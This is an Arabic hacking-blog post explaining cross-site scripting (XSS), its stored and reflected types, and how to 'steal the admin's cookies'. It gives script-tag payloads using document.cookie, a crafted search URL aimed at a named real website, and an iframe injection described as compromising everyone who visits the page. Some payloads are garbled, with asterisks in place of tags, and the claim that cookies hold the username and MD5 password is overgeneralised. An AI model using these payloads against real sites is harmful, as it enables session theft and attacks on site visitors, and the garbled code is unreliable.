السﻻم عليكم و رحمة الله و تعالى و بركاته
.jpg)
كيف حالكم متتبعي مدونة محترفي الحماية و الاختراق
اليوم لدينا شرح ثغرة xss المشهورة
تعريفها ثغرة XSS
------------------------------
و هى ثغرة من خلالها يمكنك سحب الكوكيز الخاص بالادمن
ثغرة [ XSS ] هي اختصار لـ [ Cross site scripting ]
وسبب عدم كتابتها بالاختصار الصحيح [ CSS ]
لكي لا يحدث خلط مع لغة الـ[ CSS ]
الانماط القياسية المعروفة [ Cascading Style Sheets ]
وبذلك تم تسميتها [ XSS ]
ثغرات [ XSS] لها نوعين وهما
1 ) ثغرات XSS ثابته - مخزّنه [ Persistent - stored ]
2 ) ثغرات XSS غير ثابته - غير مخزّنه
[ Non persistent - Reflecte ]
ثغرات XSS الثابته هي اخطر من النوع الغير ثابت ,
وذلك لان ثغرات XSS الثابته , مايدخله الزائر ثابت بالصفحه ,
اي مايدخله مثلاً يخزّن بقاعدة بيانات السكربت
ثغرات الغير ثابته , هي النوع الاكثر انتشاراً
وليس خطورة وهي التي تقوم على اساس الادخال الخاص مثلاً
, كما ذكرنا سابقاً عند البحث
في المنتديات هنا الحالة تسمى غير ثابته
الكود المهم في ثغرات xss
كود الاستغﻻل
--------------------------
**********alert(**************)</script>**********alert("XSS")</script>
هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً في ثغرات
**********alert(**************)</script>**********alert("XSS")</script>
هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً في ثغرات
هذا السكربت و ظيفته هي سرقة الكوكيز و هذا الكوكيز
يحتوي على اليوزر نايم و الباسوورد المشفر md5
مثلا ناخذ هذا الموقع
https://www.calacademy.orgوريح يكون استغلال مثلا بشكل هذا
=https://www.calacademy.org/search.php?qالكود هذا نحطو في اخير بعد العلامة ( = )
نحط هذا الكود وانت يمكن تغير ما بينا قوسين الملف المصاب
**********alert(document.cookie)</script>**********alert("XSS")</script>
المهم يصبح هيك
https://www.calacademy.org/search.php?q=%3Cscript%3Ealert%28document.cookie%2 9%3C/script%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
هناك العديد من الطرق , وجميعها تعتبر من الطرق البرمجية ( اي حقن اكواد برمجية ) ,
لذلك كل ما زادت خلفية المخترق في البرمجة كل ما تمكن من التعامل مع هذه الثغرات باحترافية اكثر .
1 – تلغيم الصفحة .
وهنا سيتم حقن اكواد HTML لاضافة صفحة خفية ملغومة في داخل الموقع ( الصفحة ) المصاب
اقرأ المزيد: تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها
<html>
<iframe name=”I1″ src=”https://www.calacademy.org/server.html” marginwidth=”1″ marginheight=”1″ height=”1″ width=”1″ scrolling=”no” border=”0″ frameborder=”0″>
</iframe>
</iframe></p>
</html>
عندها سيتم فتح هذا الموقع بطريقة خفية , وسيتم اختراق
كل من دخل للصفحة التي تم حقن الكود فيها .
الادوات :
-----------------
موقع للتلغيم ( كل شخص يختار اي موقع للتلغيم )
وفي الاخير اتمنى ان اكون قد اوصلت لكم المعلومات الكافية
وارجو من الله تعالى ان يوفقني ويوفقكم فيما يحبه ويرضاه والسلام عليكم
لاتنسونا بتققيم الموضوع
مع تحيات أنوار الناشي
خارج الموضوع تحويل الاكوادإخفاء الابتساماتإخفاء